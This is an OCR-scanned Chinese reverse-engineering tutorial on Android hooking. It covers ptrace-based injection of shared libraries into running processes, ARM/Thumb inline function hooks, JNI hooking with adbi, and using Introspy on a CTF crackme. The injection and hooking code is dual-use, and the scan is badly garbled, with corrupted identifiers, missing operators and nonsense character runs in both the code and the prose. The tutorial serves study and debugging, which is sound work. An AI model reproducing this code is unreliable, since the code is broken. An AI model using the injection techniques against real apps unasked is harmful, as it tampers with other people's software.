我 们 再 来 看 一 下 被 加 载 的 so 文件 ， 里 面 的 内 容 为 : 


int mzhengHook(char * str){ 
printf("mzheng Hook pid = %d\n", getpid()); 
prantt( HeLllo29sNn str) 
LOGD("mzheng Hook pid = %d\n", getpid()); 
LOGD("Hello %s\n", str); 
return o; 


这 里 我 们 不 光 使 用 printf() 还 使 用 了 android debug 的 函数 LOGD() 用 来 输出 调试 结果 。 所 以 在 编 
译 时 我 们 需要 加 上 LocAL LDLIBS := -llog 。 


编译 完 后 ， 我 们 使 用 hook4 对 target 程 序 进行 hook : 


* ./target 


Hello,LiBieGou! 
Hello,LiBieGou! 
Hello,LiBieGou! 
mzheng Hook pid 
Hello 7weapons 
Hello,LiBieGou! 
Hello,LiBieGou! 
Hello,LiBieGou! 


INEO 


6043 


O1 0 


logcat: 


D/DEBUG ( 6043): mzheng Hook pid - 6043 
D/DEBUG ( 6043): Hello 7weapons 


# ./hook4 6043 

getting remote addres: 

mmap addr-Oxb6f80c81 dlopen addr-OxbefdOf4d dlsym_addr=Oxb6fd0e9d dlclose addr-oxbefdo 
e19 

map base = Oxb6f2f000 

save so path = /data/local/tmp/libinject.so to map base = Oxb6f2f000 

handle = Oxb6fcd494 

save function name = mzhengHook to map base = Oxb6f2f000 

function ptr = Oxb6f29cbd 

save parameter = 7weapons to map base = Oxb6f2f000 


可 以 看 到 无 论 是 stdout 还 是 logcat 都 成 功 的 输出 了 我 们 的 调试 信息 。 这 意味 着 我 们 可 以 通过 注 
入 让 目标 进程 加 载 so 文 件 并 执行 任意 代码 了 。 


0x06 人 小结 


现在 我 们 已 经 可 以 做 到 hook system call 尺 及 动态 的 加 载 自 定义 So 文件 并 且 运行 so 文件 中 的 函 
数 了 ， 但 离 执行 以 及 hook java 层 的 函数 还 有 一 定 距 离 。 因 为 篇 幅 原 因 ， 我 们 的 hook 之 旅 就 先 
进行 到 这 里 ， 歼 请 期 待 一 下 篇 《离别 钧 - Hooking) ° 


文章 中 所 有 提 到 的 代码 和 工具 都 可 以 在 我 的 github 下 载 到 ， 地 址 是 : 


https://github.com/zhengmin1989/TheSevenWeapons 
0x07 参考 资料 
Playing with Ptrace http://www.linuxjournal.com/article/6100 


System Call Tracing using ptrace 
古河 的 Libinject http://bbs.pediy.com/showthread.php?t=141355 


原文 by RA 


0x00 序 


随 着 移动 安全 越 来 越 火 ， 各 种 调试 工具 也 都 层出不穷 ， 但 因为 环境 和 需求 的 不 同 ， 并 没有 工 
具 是 万 能 的 。 另 外 工具 是 死 的 ， 人 是 活 的， 如 果 能 搞 懂 工具 的 原理 再 结合 上 自身 的 经 验 ， 你 
也 可 以 创造 出 属于 自己 的 调试 武器 。 因 此 ， 笔 者 将 会 在 这 一 系列 文章 中 分 享 一 些 自己 经 常用 
或 原创 的 调试 工具 以 及 手段 ， 布 望 能 对 国内 移动 安全 的 研究 起 到 一 些 催化 剂 的 作用 。 


文章 中 所 有 提 到 的 代码 和 工具 都 可 以 在 我 的 github 下 载 到 ， 地 址 是 : 
https://github.com/zhengmin1989/TheSevenWeapons 


0x01 利用 部 数 挂 钓 实现 native 层 的 hook 


我 们 在 离别 钓 (上 ) 中 已 经 可 以 做 到 动态 的 加 载 自 定 义 So 文 件 并 且 运 行 So 文件 中 的 函数 了 ， 但 还 
不 能 做 到 hook 目 标 兄 数 ， 这 里 我 们 需要 用 到 函数 挂 钓 的 技术 来 做 到 这 一 点 。 函 数 挂 钓 的 基本 
原理 是 先 用 mprotect() 将 原 代码 段 改 成 可 读 可 写 可 执行 ， 然 后 修改 原 函 数 入 口 处 的 代码 ， 让 pc 
指针 跳 转 到 动态 加 载 的 So 文件 中 的 hook 函 数 中 ， 执 行 完 hook 函 数 以 后 再 让 pc 指针 跳 转 回 原本 

的 函数 中 。 


用 来 注入 的 程序 hook5 逮 辑 与 之 前 的 hook4 相 比 并 没有 太 大 变化 ， 仅 仅 少 了 “调用 dlclose 5 2X 
so 文件 "这 一 个 步骤 ， 因 为 我 们 想 要 执行 的 hook 后 的 沟 数 在 so 中 ， 所 以 并 不 需要 调用 dlclose 进 
行 邱 载 。 基 本 步骤 如 下 : 


保存 当前 寄存 器 的 状态 -> RRA per 的 mmap, dlopen, disym, diclose 地 址 -> 调用 mmap 
分 配 一 段 内 存 空间 用 来 保存 参数 信息 -> 调用 dlopen 加 载 so 文 件 -> 调用 dlsym 找 到 目标 函数 地 
Ak -> 使 用 ptrace_call 执 行 目标 函数 -> 恢复 寄存 器 的 状态 


hook5 的 主要 代码 逻辑 如 下 : 


void injectSo(pid_t pid,char* so_path, char* function_name,char* parameter) 
{ 

struct pt regs old_regs, regs; 

long mmap_addr, dlopen addr, dlsym addr, dlclose addr; 


//save old regs 


ptrace(PTRACE GETREGS, pid, NULL, &old regs); 
memcpy(&regs, &old regs, sizeof(regs)); 


//get remote addres 


printf("getting remote addres:\n"); 

mmap addr - get remote addr(pid, libc path, (void *)mmap); 

dlopen addr - get remote addr( pid, libc path, (void *)dlopen ); 
dlsym addr - get remote addr( pid, libc path, (void *)dlsym ); 
dlclose addr - get remote addr( pid, libc path, (void *)dlclose ); 


printf("mmap_addr=%p dlopen_addr=%p dlsym_addr=%p dlclose_addr=%p\n", 
(void*)mmap addr,(void*)dlopen addr,(void*)dlsym addr,(void*)dlclose addr); 


long parameters[10]; 
/ /mmap 


parameters[6] 
parameters[1] 
parameters[2] 
parameters[3] 
parameters[4] 
parameters[5] 


0; //address 

0x4000; //size 

PROT READ | PROT WRITE | PROT EXEC; //WRX 
MAP ANONYMOUS | MAP PRIVATE; //fiag 

0. //fd 

0; //offset 


ptrace call(pid, mmap addr, parameters, 6, &regs); 
ptrace(PTRACE GETREGS, pid, NULL, &regs); 


long map base - regs.ARM r0; 
printf("map base = %p\n", (void*)map base); 


/ / dlopen 


printf("save so path = %s to map base = %p\n", so path, (void*)map base); 
putdata(pid, map base, so path, strien(so path) + 1); 


parameters[6] 
parameters[1] 


map base; 
RTLD NOW| RTLD GLOBAL; 


ptrace call(pid, dlopen addr, parameters, 2, &regs); 
ptrace(PTRACE GETREGS, pid, NULL, &regs); 


long handle - regs.ARM r0; 

printf("handle = %p\n",(void*) handle); 
//dlsym 

printf("save function name = %s to map base = %p\n", function name, (void*)map bas 
zu putdata(pid, map base, function name, strien(function name) + 1); 


parameters[6] 
parameters[1] 


handle; 
map base; 


ptrace call(pid, dlsym addr, parameters, 2, &regs); 
ptrace(PTRACE GETREGS, pid, NULL, &regs); 


long function ptr - regs.ARM r0; 
printf("function ptr = %p\n", (void*)function ptr); 
//function call 


printf("save parameter = %s to map base = %p\n", parameter, (void*)map base); 
putdata(pid, map base, parameter, strien(parameter) + 1); 


parameters[0] = map base; 
ptrace call(pid, function ptr, parameters, i, &regs); 
//restore old regs 


ptrace(PTRACE SETREGS, pid, NULL, &old regs); 


我 们 知道 arm 处 理 器 支持 两 种 指令 集 ， 一 种 是 arm 指 令 集 ， 另 一 种 是 thumb 指 令 集 。 所 以 要 
hook 的 函数 可 能 是 被 编译 成 arm 指 令 集 的 ， 也 有 可 能 是 被 编译 成 thumb 指 令 集 的 。Thumb 指 令 
集 可 以 看 作 是 arm 指 令 压 缩 形式 的 子 集 ， 它 是 为 减 小 代码 量 而 提出 ， 具 有 16bit 的 代码 密度 。 


Thumb 指 令 体 系 并 不 完整 ， 只 支持 通用 功能 ， 必 要 时 仍 需 要 使 用 ARM 指 令 ， 如 进入 异常 时 。 
需要 注意 的 一 点 是 thumb 指 令 的 长 度 是 不 固定 的 ， 但 arm 指 令 是 固定 的 32 位 长 度 。 


为 了 让 大 家 更 容易 的 理解 hook 的 原理 ， 我 们 先 只 考虑 arm 指 令 集 ， 因 为 arm 相 比 thumb 要 简单 
一 点 ， 不 需要 考虑 指令 长 度 的 问题 。 所 以 我 们 需要 将 target 和 hook 的 so 编译 成 arm 指 令 集 的 形 
式 。 怎 么 做 呢 ?很 简单 ， 只 要 在 Android.mk 中 的 文件 名 后 面 加 上 "arm" 即 可 (AERA 
加 )。 


include $(CLEAR_VARS) 
LOCAL_MODULE := target 
LOCAL_SRC_FILES := target.c.arm 
include $(BUILD EXECUTABLE) 


include $(CLEAR VARS) 


LOCAL MODULE := inject2 
LOCAL SRC FILES :- inject2.c.arm 
LOCAL LDLIBS := -llog 


include $(BUILD SHARED LIBRARY) 


确定 了 指令 集 以 后 ， 我 们 来 看 实现 挂钩 最 重要 的 逻辑 ， 这 个 逻辑 是 在 注入 后 的 So 里 实现 的 。 
首先 我 们 需要 一 个 结构 体 保 存 汇编 代码 和 hook 地 址 : 


struct hook_t { 
unsigned int jump[3]; //4&£ 
unsigned int store[3]; // 
unsigned int orig; // 保 存 
unsigned int patch; // 保 存 hoo 









HN 


我 们 接着 来 看 注入 的 逻辑 ， 最 重要 的 函数 为 hook_direct()， 他 有 三 个 参数 ， 一 个 参数 是 我 们 最 
开始 定义 的 用 来 保存 汇编 代码 和 hook 地 址 的 结构 体 ， 第 二 个 是 我 们 要 hook 的 原 函 数 的 地 址 ， 


ys 


Se =e RATA RAN ATHOOKN BA o HAM REB de T: 


int hook_direct(struct hook_t *h, unsigned int addr, void *hookf) 


{ 

int i; 

printf("addr = %x\n", addr); 

printf("hookf = %x\n", (unsigned int)hookf); 
//mprotect 


mprotect((void*)0x8000, 0xa000-0x8000, PROT_READ|PROT_WRITE|PROT_EXEC); 


//modify function entry 
h-»patch - (unsigned int)hookf; 
h->orig = addr; 
h->jump[0] = 0xe59ff000; // LDR pc, [pc, #0] 
h->jump[1] h->patch; 
h->jump[2] h->patch; 
for (i = 0; i < 3; itt) 
h->store[i] = ((int*)h->orig) [i]; 
for (i = 0; i < 3; itt) 
((int*)h->orig)[i] = h->jump[i]; 


//cacheflush 
hook_cacheflush( (unsigned int)h->orig, (unsigned int)h->orig+sizeof(h->jump) ); 
return 1; 

} 


虽然 android 有 ASLR， 但 并 没有 PIE， 所 以 program image 是 固定 在 0x8000 这 个 地 址 的 ， 因 此 
我 们 用 mprotect() 函 数 将 整个 target 代 码 段 变 成 RWX， 这 样 我 们 就 能 修改 函数 入 口 处 的 代码 
了 。 是 否 修改 成 功 可 以 通过 cat /proc/[pidl/maps 查 看 : 


# cat /proc/25298/maps 


00008000-0000a000 rwxp 00000000 b3:1c 627105 /data/local/tmp/target 
0000a000-0000b000 r--p 00001000 b3:1c 627105 /data/local/tmp/target 
0000b000-0000c000 rw-p 00000000 00:00 0 

0017f000-00180000 rw-p 00000000 00:00 0 [heap] 


随后 我 们 需要 确定 目标 函数 的 地 址 ， 这 个 有 两 种 方法 。 如 果 目 标 程 序 本 身 没有 被 strip 的 话 ， 那 
些 symbol 都 是 存在 的 ， 因 此 可 以 使 用 dlopen() 和 dlsym() 等 方法 来 获取 目标 函数 地 址 。 但 很 多 
情况 ， 目 标 程序 都 会 被 strip， 特 别 是 可 以 直接 运行 的 二 进 制 文件 默认 都 会 被 直接 strip。 上 比如 
target 中 的 sevenWeapons() 这 个 函数 名 会 在 编译 的 时 候 去 掉 ， 所 以 我 们 使 用 dlsym() 的 话 是 无 
法 找到 这 个 函数 的 。 这 时 候 我 们 就 需要 使 用 ida 或 者 objdump 来 定位 一 下 目标 函数 的 地 址 。 比 
如 我 们 用 objdump 找 一 下 target 程 序 里 面 sevenWeapons(int number) 这 个 函数 的 地 址 : 


84d4: e1a01000 mov r1, ro 


84d8: e59f200c ldr r2, [pc, #12] ; 84ec « cxa type match@plt+0 
xe4> 

84dc: e59f000c ldr rO, [pc, #12] ; 84fO « cxa type match@plt+0 
Xe8> 

84e0 : e08f2002 add [CC 

84e4: e08f0000 add rO, pc, ro 

84e8: eaffffb1 b 83b4 « cxa atexitOplt» 

84ec: 00002b18 andeq r2, rO, r8, 1sl fp 

84f0: ffffff58 ; «UNDEFINED» instruction: Oxffffff58 

84f4: e1a02000 mov r2, ro 

84f8: e59f100c ldr ri, [pc, #12] ; 850c « cxa type match@plt+0 
x104> 

84fc : e59f000c ldr rO, [pc, #12] ; 8510 « cxa_type_match@plt+0 
x108> 

8500: e08f1001 add rd PC, et 

8504: e08f0000 add rO, pc, ro 

8508: eaffffac b 83c0 <printf@plt> 

850c: 00001080 andeq r1, rO, rO, 1sl #1 

8510: 00001074 andeq ri, rO, r4, ror rO 

8514: b5006803 strlt r6, [rO, #-2051] P T0» PIT PAPHETALRS. 

8518: d503005a strle ro, [r3, 2-90] ; Oxffffffa6 
851c : 06122280 ldreq r2, [r2], -r0, 1sl #5 


虽然 target 这 个 binary 被 strip 了 ， 但 还 是 可 OA i 3 Be 89 ALE Mo bb E HE 
Ox84f4 ° AA”mov r2, r0” 就 是 加 载 number 这 个 参数 的 指令 ， 随 后 调用 了 printf@plt 用 来 输出 结 
T o 最 后 一 个 参数 也 就 是 我 们 要 执行 的 hook 函 数 的 地 址 。 得 到 这 个 地 址 非常 简单 ， 因 为 是 so 
中 的 函数 ， 调 用 hook direct() 的 时 候 直接 写 上 函数 名 即 可 。 


hook direct(&eph,hookaddr,my sevenWeapons); 

Dd en (modify function entry) ， 首 先 我 们 保存 一 下 原 函 数 的 地 址 
和 那个 函数 的 前 三 条 指令 。 随 后 我 们 把 目标 函数 的 第 一 条 指令 修改 为 LDR po, [pc, #0]， 这 条 
eG HR IG Bock REE MOUSER EE A QURE 
8» MARNIE dn P8 4b T8 SABE A hook HAH HOHE > RAE SS ^ HAN REALE HI PC SERE Fl 

hook Zt 49 Heat T » 


最 后 我 们 再 调用 hook_cacheflush() 这 个 函数 来 刷新 一 下 指令 的 缓存 。 因 为 虽然 前 面 的 操作 修 
改 了 内 存 中 的 指令 ， hb addas uM cde T 再 执行 的 话 ，CPU 可 能 会 优 
先 执行 缓存 中 的 指令 ， 使 得 修改 的 指令 得 不 到 执行 。 所 以 我 们 需要 使 用 一 个 隐藏 的 系统 调用 
来 刷新 一 下 缓存 。 hook_cacheflush() ue 1 


void inline hook_cacheflush(unsigned int begin, unsigned int end) 


{ 
const int syscall = 0xf0002; 
. asm __volatile ( 
"mov ro, %0\n" 
"mov (palo. AINNE 
"mov Gite 262 NN 
"mov r2, #0x0\n" 
"svc 0x00000000\n" 
"r" (begin), "r" (end), "r" (syscall) 
: "poi MA Mrz 
); 
} 


AZAA > ANAT BUS BAY AR > pods 4E 30 SER FI AAT E E LAHOokBA HY T > 
hook 4 ak XE. 8 AG 4e T : 


void _ attribute — ((noinline)) my sevenweapons(int number) 


t 


printf("sevenWeapons() called, number = %d\n", number); 
number++; 


void (*orig_sevenWeapons) (int number); 
orig sevenWeapons = (void*)eph.orig; 


hook precall(&eph); 


orig sevenWeapons (number); 
hook postcall(&eph); 


首先 在 hook 函 数 中 ， 我 们 可 以 获得 原 函 数 的 参数 ， 并 且 我 们 可 以 对 原 函 数 的 参数 进行 修改 ， 
比如 说 将 数字 乘 2。 随 后 我 们 使 用 hook_precall(&eph); 将 原本 函数 的 内 容 进 行 还 
原 。 hook precall() 内 容 如 下 : 


void hook precall(struct hook t *h) 


{ 
NE ale 
fono “al x S TEE) 
((int*)h->orig)[i] = h->store[i]; 
hook cacheflush((unsigned int)h->orig, (unsigned int)h->orig+sizeof(h->jump)*10); 
} 


在 hook_precall() 中 ， 我 们 先 对 原本 的 三 条 指令 进行 还 原 ， 然 后 使 用 hook_cacheflush() 对 内 
存 进 行 刷新 。 经 过 处 理 之 后 ， oe K 4) & Zorig_sevenWeapons(number) f ° 
执行 完 后 ， 如 果 我 们 还 想 再 次 hook 这 个 函数 ， 就 需要 调用 hook postcall(&eph) 将 原本 的 三 条 
指令 再 进行 一 次 修改 。 


下 面 我 们 来 使 用 hook5 和 libinject2.so 来 注入 一 下 target 这 个 程序 : 


Hello, LiBieGou! 
Hello, LiBieGou! 
Hello, LiBieGou! 
Hello, LiBieGou! 
Hello, LiBieGou! 
Hello, LiBieGou! 
Hello, LiBieGou! 
mzheng Hook pid 
Hello sevenWeapons 

addr = 84f4 

hookf = b6e73e88 

sevenWeapons() called, number = 7 
Hello, LiBieGou! 14 

sevenWeapons() called, number = 8 
Hello,LiBieGou! 16 

sevenWeapons() called, number - 9 
Hello,LiBieGou! 18 

sevenWeapons() called, number - 10 
Hello,LiBieGou! 20 

sevenWeapons() called, number - 11 
Hello,LiBieGou! 22 

sevenWeapons() called, number - 12 
Hello,LiBieGou! 24 

sevenWeapons() called, number - 13 


LoanBBKRWNHRO® 


18962 


./hook5 28922 


getting remote addres: 

mmap addr-Oxbef84c81 dlopen addr-Oxbefd4f4d dlsym_addr=Oxb6fd4e9d dlclose_addr=0xb6fd4 
e19 

map base = Oxb6f33000 

save so path = /data/local/tmp/libinject2.so to map base = Oxb6f33000 

handle = Oxb6fd1494 

save function name = mzhengHook to map base = Oxb6f33000 

function ptr = Oxb6f2e368 

save parameter = sevenWeapons to map base = Oxb6f33000 


可 以 看 到 经 过 注入 后 ， 我 们 成 功 的 获取 了 参数 number 的 值 ， 并 且 将 "Hello,LiBieGoul" 后 面 的 
数字 变 成 了 原来 的 两 倍 。 


0x02 使 用 adbi 实 现 JNI 层 的 hook 


我 们 在 上 一 节 中 介绍 了 如 何 hook native 层 的 函数 。 下 面 我 们 再 来 讲 讲 如 何 利 用 adbi 来 hook 
JNI 层 的 函数 。 a 6 E6$— 个 注入 框架 ， 本 身 是 开源 的 。Hook 的 原理 和 我 
们 之 前 介绍 的 技术 是 一 样 的 ， 这 个 框架 支持 arm 和 thumb 指 令 集 ， 也 支持 通过 字符 串 定位 
symbol & Zt à sht © 


首先 我 们 需要 一 个 例子 用 来 讲解 ， 所 以 我 号 了 程序 叫 test2 © 





1+1=2 


BUTTON 





点 击 程序 中 的 button 后 ， 程 序 会 调用 so 中 


的 Java com mzheng libiegou test2 MainActivity stringFromJNI(JNIEnv* env, jobject thiz, jint 


函数 用 来 计算 at+b 的 结果 。 我 们 默认 传 的 参数 是 a=1, b=1。 接 下 来 我 就 来 教 你 如 何 利 用 adbi 来 
hook3x AJNI $ žr ° 


因为 adbi 是 一 个 注入 框架 ， 我 们 下 载 好 源码 后 ， 只 要 对 应 着 源码 中 给 的 example 照 猫 画 虎 即 
可 。Hijack 那 个 文件 夹 是 保存 的 用 来 注入 的 程序 ， 和 我 们 之 前 讲 的 hook5.c 的 原理 是 一 样 的 ， 
所 以 不 用 做 任何 修改 。 我 们 只 需要 修改 example 中 的 代码 ， 也 就 是 将 要 注入 的 So 文件 的 源码 。 


首先 ， 我 们 在 /adbi-masterinstruments/example 这 个 文件 夹 下 新 建 两 个 文件 "hookjni.c" 和 ” 
hookjni arm.c" ° *hookjni arm.c" X- t A — 4 óc > M od Ehook $ žá A. v 283€ armis A d 
的 ， 内 容 如 下 : 


extern jstring my Java com mzheng libiegou test2 MainActivity stringFromJNI(JNIEnv* en 
Vv JoObJect thiz Jint a Jine D), 


jstring my Java com mzheng libiegou test2 MainActivity stringFromJNI arm(JNIEnv* env, j 
object thiz,jint a,jint b) 


return my Java com mzheng libiegou test2 MainActivity stringFromJNI(env, thiz, a, 
b); 
} 





这 个 文件 的 目的 仅仅 是 为 了 用 arm 指 令 集 进行 编译 ， 可 以 看 到 Android.mk 中 
在 "hookjni_arm.c" 后 面 多 了 个 "arm”: 


include $(CLEAR_ VARS) 


LOCAL_MODULE = libexample 
LOCAL SRC FILES := ../hookjni.c ../hookjni arm.c.arm 
LOCAL CFLAGS :- -g 


LOCAL SHARED LIBRARIES :- dl 
LOCAL STATIC LIBRARIES :- base 
include $(BUILD SHARED LIBRARY) 


下 面 我 们 来 看 "hookjni.c”: 


jstring my_Java_com_mzheng_libiegou_test2_MainActivity_stringFromJNI(JNIEnv* env, jobje 
ct Ehiz Jint a Jint p) 


{ 
jstring (*orig_stringFromJNI)(JNIEnv* env,jobject thiz,jint a,jint b); 
orig_stringFromJNI = (void*)eph.orig; 
a = 10; 
b = 10; 
hook_precall(&eph); 
jstring res = orig_stringFromJNI(env, thiz, a, b); 
if (counter) { 
hook_postcall(&eph); 
log("stringFromJNI() called\n"); 
counter--; 
if (!counter) 
log("removing hook for stringFromJNI()\n"); 
} 
return res; 
} 
void my_init(void) 
{ 


counter = 3; 
log("%s started\n", _ FILE ) 
set_logfunction(my_log); 


hook(&eph, getpid(), "libhello-jni.", "Java com mzheng libiegou test2 MainActivity 
 stringFromJNI", my Java com mzheng libiegou test2 MainActivity stringFromJNI arm, my 
Java com mzheng libiegou test2 MainActivity stringFromJNI); 


} 





这 段 代 码 和 我 上 一 节 讲 的 代码 非常 像 ，my_init() 用 来 进行 hook 操 作 ， 我 们 需要 提供 想 要 hook 
的 So 文件 名 和 函数 名 ， 然 后 再 提供 thumb 指 令 集 和 arm 指 令 集 的 hook 函 数 地 址 。 


my Java com mzheng libiegou test2 MainActivity stringFromJNI()3 zx 4x41] 4 4 89 hook & 
数 了 。 我 们 在 这 个 hook 函 数 中 把 a 和 b 都 改 成 了 10。 除 此 之 外 ， 我 们 还 使 用 counter 这 个 全 局 变 
量 来 控制 hook 的 次 数 ， 这 里 我 们 把 counter 设 置 为 3， 当 hook 了 3 次 以 后 ， 就 不 再 进行 hook 操 
作 了 。 


编辑 好 代码 后 ， 我 们 只 需要 在 adbi 的 根 目 录 下 执行 " build.sh” 进 行 编译 : 


adbi-master$ ./build.sh 


[armeabi] Compile arm : hijack <= hijack.c 

[armeabi] Executable : hijack 

[armeabi] Install : hijack => libs/armeabi/hijack 
[armeabi] Compile arm : base <= util.c 

[armeabi] Compile arm : base <= hook.c 

[armeabi] Compile arm : base <= base.c 

[armeabi] StaticLibrary : libbase.a 

[armeabi] Compile thumb : example <= hookjni.c 
[armeabi] Compile arm : example <= hookjni_arm.c 
[armeabi] SharedLibrary : libexample.so 

[armeabi] Install : libexample.so => libs/armeabi/libexample.so 


编译 好 后 ， 我 们 把 hijack 和 libexample.so 找 贝 到 /data/localtmp 目 录 下 。 然 后 使 用 hijack 进 行 注 
A 


#./hijack -d -p 21734 -1 /data/local/tmp/libexample.so 


mprotect: 0x4011c444 

dlopen: 0x400d5f4d 

pc-4011d6e0 1r-4018588b sp-bed65308 fp-bed6549c 
ro-fffffffc ri-bed65328 

r2-10 r3-ffffffff 

stack: Oxbed45000-O0xbed66000 leng = 135168 
executing injection code at Oxbed652b8 

calling mprotect 

library injection completed! 


然后 我 们 再 点 击 button 就 可 以 看 到 我 们 已 经 成 功 的 修改 了 a 和 b 的 值 为 10 了 ， 最 后 显示 
1+1=20。 


4 Fa©® 晚上 8:04 





1+1=20 


BUTTON 


= vais mL 


通过 cat adbi example.log 我 们 可 以 看 到 hook 过 程 中 打印 的 log : 


#cat adbi_example.log 


/home/aliray/7weapons/libiegou/adbi-master/instruments/example/jni/../hookjni.c starte 
d 

hooking: Java com mzheng libiegou test2 MainActivity stringFromJNI = 0x7538ecc5 THUM 
B using 0x763c9581 

stringFromJNI() called 

stringFromJNI() called 

stringFromJNI() called 

removing hook for stringFromJNI() 


可 以 看 到 adbi 是 通过 thumb 指 令 集 进行 hook 的 ， 原 因 是 test2 程 序 是 用 thumb 指 令 集 进行 编译 
的 。 其 实 hook thumb 指 令 集 和 arm 指 令 集 差 不 多 ， 在 ”adbi-master/instruments/base” 中 可 以 
找到 hook thumb 指 令 集 的 逻辑 : 


if ((unsigned long int)hook_thumb % 4 == 0) 
log("warning hook is not thumb 0x%lx\n", (unsigned long)hook thumb) 
h->thumb = 1; 
log("THUMB using 0x%lx\n", (unsigned long)hook thumb) 
h-»patch - (unsigned int)hook thumb; 
h-»orig - addr; 





h->jumpt[i] = 0xb4; 

h-»jumpt[0] = 0x60; // push {r5,r6} 
h->jumpt[3] = 0x85; 

h->jumpt[2] = 0x03; // add r5, pc, #12 
h-»jumpt[5] = 9x68; 

h->jumpt[4] = 0x2d; // ldr r5, [r5] 
h->jumpt[7] = 0xb0; 

h->jumpt[6] = 0x02; // add sp, sp, £8 
h->jumpt[9] = 0xb4; 

h->jumpt[8] = 0x20; // push {r5} 
h-»jumpt[11] = 0xb0; 

h->jumpt[10] = 0x81; // sub sp,sp,#4 
h-»jumpt[13] = Oxbd; 

h->jumpt[12] = 0x20; // pop {r5, pc} 
h-»jumpt[15] = 0x46; 


h->jumpt[i4] Oxaf; // mov pc, r5 ; just to pad to 4 byte boundary 
memcpy(&h->jumpt[16], (unsigned char*)&h->patch, sizeof(unsigned int)); 
unsigned int orig - addr - 1; // sub 1 to get real address 
hon (I= ros 20; i 

h->storet[i] = ((unsigned char*)orig)[i]; 

//log("9609.2x ", h-»storet[i]) 


} 

//log("Nn") 

tor (4 2-95 1 «205 3t) 4 
((unsigned char*)orig)[i] = h-»jumpt[i]; 
//log("9609.2x ", ((unsigned char*)orig)[i]) 


其 实 h->jumpt[20] 这 个 字符 数组 保存 的 就 是 thumb 指 令 集 下 控制 pc 指针 跳 转 到 hook 函 数 地址 的 
代码 。Hook 完 之 后 的 流程 就 和 arm 指 令 集 的 hook 一 样 了 。 


ms 


0x03 使 用 Cydia 或 Xposed 实 现 JAVA 层 的 hook 


关于 Cydia 和 Xposed 的 文章 和 例子 已 经 很 多 了 ， 这 里 就 不 再 重复 的 进行 介绍 了 。 这 里 推荐 一 
下 站 蛟 舞 和 我 写 的 文章 ， 基 本 上 就 知道 怎么 使 用 这 两 个 框架 了 


Android.Hook 框 架 xposed 篇 (Http 流 量 监 控 ) 


Android.Hook 框 架 Cydia 篇 (脱党 机 制作 ) 


个 人 感觉 Xposed 框 架 要 做 的 更 好 一 些 ， 主 要 原因 是 Cydia 的 作者 已 经 很 久 没 有 更 新 过 Cydia 框 
架 了 ， 不 光 有 很 多 bug 还 不 支持 ART。 但 是 有 很 多 不 错 的 调试 软件 /插件 是 基于 两 个 框架 制作 
的 ， 所 以 有 时 候 还 是 需要 用 到 Cyida 的 。 


接 下 来 就 推荐 几 个 很 实用 的 基于 Cydia 和 Xposed 的 插件 : 


ZjDroid: ZjDroid 是 基于 Xposed Framewrok 的 动态 逆向 分 析 模 块 ， 逆 向 分 析 者 可 以 通过 ZjDroid 
完成 以 下 工作 : 

1、DEX 文 件 的 内 存 dump 

2、 基 于 Dalvik 关 键 指针 的 内 存 BackSmali， 有 效 破解 主流 加 固 方 案 

3、 敏 感 API 的 动态 监控 

4、 指 定 内 存 区 域 数据 dump 

5、 获 取 应 用 加 载 DEX 信 息 。 

6、 获 取 指 定 DEX 文 件 加 载 类 信息 。 

7 ` dump Dalvik java 堆 信息 。 

8、 在 目标 进程 动态 运行 lua 脚 本 。 https://github.com/halfkiss/ZjDroid 


XPrivacy: XPrivacy 是 一 款 基于 Xposed 框 架 的 模块 应 用 ， 可 以 对 所 有 应 用 可 能 泄露 隐私 的 权限 
进行 管理 ， 对 禁止 可 能 会 导致 崩 演 的 应 用 采取 欺骗 策略 ， 提 供 伪 造 信息 ， 比 如 说 可 以 伪造 手 
机 的 IMEI 号 码 等 。 https://github.com/M66B/XPrivacy 


Introspy: Introspy 是 一 款 可 以 追踪 分 析 移 动 应 用 的 黑 盒 测试 工具 并 且 可 以 发 现 安全 问题 。 这 个 
工具 支持 很 多 密码 库 的 hook， 还 支持 自 定义 hook。 
https://github.com/iSECPartners/Introspy-Android 


0x04 Introspy 3: X 


我 们 使 用 alictf 上 的 evilapk400 作 为 例子 讲解 如 何 利 用 introspy 来 调试 程序 。Evilapk400 使 用 了 

比较 复杂 的 dex 加 壳 技 术 ， 如 果 不 利用 基于 自 定 义 dalvik 的 脱党 工具 来 进行 脱党 的 话 做 起 来 会 

非常 麻烦 。 但 我 们 如 果 换 一 种 思路 ， 直 接 通 过 动态 调试 的 方法 来 获取 加 密 算法 的 字符 串 ，key 
和 |V 等 信息 就 可 以 直接 获取 答案 了 。 


首先 我 们 安装 cyida.apk，Introspy-Android Config.apk 到 手机 上 ， 然 后 用 eclipse 打 

开 “Introspy-Android Core” 的 源码 增加 一 个 自 定义 的 hook 元 数 。 虽 然 Introspy 默 认 对 密码 库 进 
行 了 hook， 但 却 没有 对 一 些 strings 的 函数 进行 hook。 所 以 我 们 手动 添加 一 个 对 String.equals() 
的 hook : 


Android Hook (下 ) 


public class CustomHookList { 


static public HookConfig[] getHookList() { 
return _hookList; 
} 


static private HookConfig[] _hookList = new HookConfig[] { 


new HookConfig(true, // set to true to enable the hook 
"java.lang.String", "equals", new Class<?>[]{Object.class}, 
// class, method name, arguments 
new HookStrings(), 
// instance of the implementation extending IntroHook (here in HookExampleInpl. java) 
"String Hook") ,| drops.wooyun.org 


a mm 


public class HookStrings extends IntroHook { 
@Override 
public void execute(Object... args) { 
// _logBasicInfo(); 
//  logParameter("mzheng Intent details", (String)args[@]); 
_logFlush_I( "Method: ”+ _config.getMethodName()); 
_logFlush_I("Equels String:" + (String)args[@]); 


} drops.wooyun.org 
然后 我 们 编译 ， 生 成 并 安装 Introspy-Android Core.apk 到 手机 上 。 然 后 我 们 安装 上 
EvilApk400 ° 然后 打开 Introspy-Android Config 4 #com.ali.encryption ° 


302 


"LM 


| e Introspy Config 


[密码 破解 ] GENERAL 
com.ali.encryption CRYPTO 


[百度 地 图 ] KEY 
com.baidu.BaiduMap 


[Introspy Config] dos 


com.introspy.config 


FS 
[Introspy Android Core] 
com.introspy.core 


[Cydia Substrate] 
com.saurik.substrate 


[MyTest] 
com.test2.mytest 


[Tools 连 接 助手 ] 


com.thinksky.itools 


WEBVIEW 


CUSTOM 
HOOKS 


A 
v 
A 
v 
d 
d 
v 
v 
v 
v 


SQLite (NO 
DB) 


- STACK 
TRACES 


mm] 





接着 打开 evilapk400， 然 后 随便 输入 点 内 容 并 点 击 登陆 。 


提示 


密码 不 对 ， 请 继续 破解 





然后 我 们 使 用 adb logcat 就 能 看 到 Introspy 输 出 的 信息 了 : 


